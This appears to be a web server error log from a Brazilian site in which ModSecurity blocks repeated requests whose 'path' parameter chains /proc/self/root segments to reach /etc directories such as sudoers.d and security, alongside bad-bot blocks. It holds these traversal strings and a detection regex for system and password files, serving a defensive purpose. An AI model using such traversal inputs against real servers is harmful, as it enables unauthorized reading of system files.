https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:06:03.302036 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:51508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVKymAPhZkrhU8w4lcPQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:10.375579 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:39862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVMuoXxyEfFpUF8f9dhAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:11.754903 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:48384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVM8df6f5d65gmYZTDuAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:16.099241 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:48394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVOPu8EFLIOrSqIpv0KwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:20.519696 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:48408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVPCmAPhZkrhU8w4lcSgAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:24.007036 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:42070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVQOyqAr6etmhZHNqtdwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:38.767098 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:51522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVTkzinOy1jxa1j4cC_wAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:07:08.018347 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 74.7.241.31:43340] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/debug/usr
[Wed Mar 18 09:07:24.522011 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:44202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVfNY0UrI5A3LftIySHwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:07:25.807755 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:42082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVfeoXxyEfFpUF8f9d0AAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:07:28.334864 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:55628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVgEzinOy1jxa1j4cDFAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:07:31.858298 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:47364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVg0zinOy1jxa1j4cDIQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:09.155617 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.244.43:54830] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqVqOw_le52K8_3pV3PIAAAAgI"]
[Wed Mar 18 09:08:11.031775 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.228.61:52766] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqVq-oXxyEfFpUF8f9d4AAAAUk"]
[Wed Mar 18 09:08:12.714259 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:55616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVrEzinOy1jxa1j4cDUAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:08:21.848169 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:44630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVtdY0UrI5A3LftIySUAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:26.050223 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:42136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVuvu8EFLIOrSqIpv0dgAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:29.455107 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:42142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVveyqAr6etmhZHNqt0AAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:46.759203 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:33584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVzsdf6f5d65gmYZTEKgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:48.030973 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:60604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV0OoXxyEfFpUF8f9eAQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:55.675069 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:60616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV19a6ubjKNq_cu4aIOQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:08:58.052347 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:56924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV2sdf6f5d65gmYZTEMAAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:09:05.193875 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:56930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqV4UzinOy1jxa1j4cDfAAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
